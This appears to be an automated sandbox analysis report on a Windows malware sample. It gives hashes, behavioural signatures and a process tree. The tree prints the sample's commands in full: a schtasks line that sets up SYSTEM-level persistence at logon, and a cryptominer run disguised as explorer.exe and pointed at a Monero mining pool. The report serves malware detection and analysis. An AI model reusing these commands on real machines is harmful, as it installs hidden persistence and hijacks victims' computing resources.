Analysis
-
max time kernel
9s -
max time network
111s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
08-01-2024 09:29
Static task
static1
Behavioral task
behavioral1
Sample
4b120bc4e493e86e34b1efea1a10db6c.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4b120bc4e493e86e34b1efea1a10db6c.exe
Resource
win10v2004-20231222-en
General
-
Target
4b120bc4e493e86e34b1efea1a10db6c.exe
-
Size
64KB
-
MD5
4b120bc4e493e86e34b1efea1a10db6c
-
SHA1
25e40d98177f72e612fb2def28a6cec2af8abc00
-
SHA256
e66d2dae8f47c828b769924d7bd5f08e50b18399f49dd0bc6cc6d70577972a28
-
SHA512
a35e33ced2e68903519210e386c4251a87a65afd1d4b66346e1ebef2b1f7798823a56732869d9e363c2c28cfb1a74177ffd9caf1c09a1668b8fef4ba92d8b6fc
-
SSDEEP
768:FSo8zLAAVxojgGxuwmSyd2glQ6pyZCQ75v3u211ToUQH7pFMhfgJ/3bhiAMG4r8j:FJaLlOjgTLBHpyQY5WHFMF41r7frqo
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4b120bc4e493e86e34b1efea1a10db6c.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 4b120bc4e493e86e34b1efea1a10db6c.exe -
Executes dropped EXE 1 IoCs
Processes:
sihost64.exepid process 4804 sihost64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4076 schtasks.exe 1696 schtasks.exe 4632 schtasks.exe 5464 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
4b120bc4e493e86e34b1efea1a10db6c.exepid process 1132 4b120bc4e493e86e34b1efea1a10db6c.exe 1132 4b120bc4e493e86e34b1efea1a10db6c.exe 1132 4b120bc4e493e86e34b1efea1a10db6c.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
4b120bc4e493e86e34b1efea1a10db6c.exedescription pid process Token: SeDebugPrivilege 1132 4b120bc4e493e86e34b1efea1a10db6c.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
4b120bc4e493e86e34b1efea1a10db6c.execmd.exedescription pid process target process PID 1132 wrote to memory of 1660 1132 4b120bc4e493e86e34b1efea1a10db6c.exe cmd.exe PID 1132 wrote to memory of 1660 1132 4b120bc4e493e86e34b1efea1a10db6c.exe cmd.exe PID 1660 wrote to memory of 4076 1660 cmd.exe schtasks.exe PID 1660 wrote to memory of 4076 1660 cmd.exe schtasks.exe PID 1132 wrote to memory of 4804 1132 4b120bc4e493e86e34b1efea1a10db6c.exe sihost64.exe PID 1132 wrote to memory of 4804 1132 4b120bc4e493e86e34b1efea1a10db6c.exe sihost64.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4b120bc4e493e86e34b1efea1a10db6c.exe"C:\Users\Admin\AppData\Local\Temp\4b120bc4e493e86e34b1efea1a10db6c.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1660
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"2⤵PID:4844
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit3⤵PID:3976
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=803⤵PID:3044
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"2⤵
- Executes dropped EXE
PID:4804 -
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"3⤵PID:2252
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit4⤵PID:5828
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=804⤵PID:4480
-
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"3⤵PID:5600
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit4⤵PID:4788
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=804⤵PID:1440
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"1⤵
- Creates scheduled task(s)
PID:4076
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"1⤵
- Creates scheduled task(s)
PID:1696
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"1⤵
- Creates scheduled task(s)
PID:4632
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"1⤵
- Creates scheduled task(s)
PID:5464
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ceb4947e275f4845f304cd494e65aa0c
SHA1ac77f13a759423a94c1bcb40a08f7a48800f202b
SHA2565b44ad3f2e7ec4999744e367f1e6e3fe9cfeaa6d4f025bd17f7ac534383e78c9
SHA51219300aa7db232c2698bf7b5b29309606d149367e8818af03f1808e32269392f4fea0f67a9a91dde328388e3453e44ae1623fb25c42cff9f1531c97dcb2dc0c73
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
12KB
MD524ff7a763f96b93d11e47f99678620c6
SHA1cbbae214991f923b9f62eef19bf4a2ada083f514
SHA2562837716c122b32c14068667611fa685b0bb23450b17912de262013d2199634ba
SHA5122c9e0303f140d7a414f34964233c61f6f05f60a877ffd050a109ed956db9d098f0dc9afa98a949487b312630b44c88941f8df65324ac1ac355ffcc70ed69c0cb
-
Filesize
98KB
MD5b02e9bc499adf8e14f68ca2178dbb140
SHA1b99ca4228b2daf686533f39be2c79decc07e3e1f
SHA2567161fa42a6af56de2dd5535d2e7a1db05e54191c4805aa8fd8fe0cf882c5bf9a
SHA512da2f3745165bc0060df992e13949b6cc0bfa1868124fc24531f19b53ed63429ab751c9fd0ab73d933e0f241ebc66a95c9ae1667d4e4e82af8e2d1d0c6dceb110
-
Filesize
44KB
MD58dd7325927dadc0671891968133e5745
SHA1f787c2b9191a576f1acc8f950b48841ffba7868e
SHA256bbfc4bf7f7e55a008b4eb6d59ac84f9b97b2298a8963c36e0d13f4acd92360d4
SHA51278777b8aa66197886463bc932e7ac6fb0b17ac1050d67215ac79e759141cf34c460619c8f83435935543a5049f7a1be6936b53d079a94f7909e5ed28e8e12806
-
Filesize
64KB
MD54b120bc4e493e86e34b1efea1a10db6c
SHA125e40d98177f72e612fb2def28a6cec2af8abc00
SHA256e66d2dae8f47c828b769924d7bd5f08e50b18399f49dd0bc6cc6d70577972a28
SHA512a35e33ced2e68903519210e386c4251a87a65afd1d4b66346e1ebef2b1f7798823a56732869d9e363c2c28cfb1a74177ffd9caf1c09a1668b8fef4ba92d8b6fc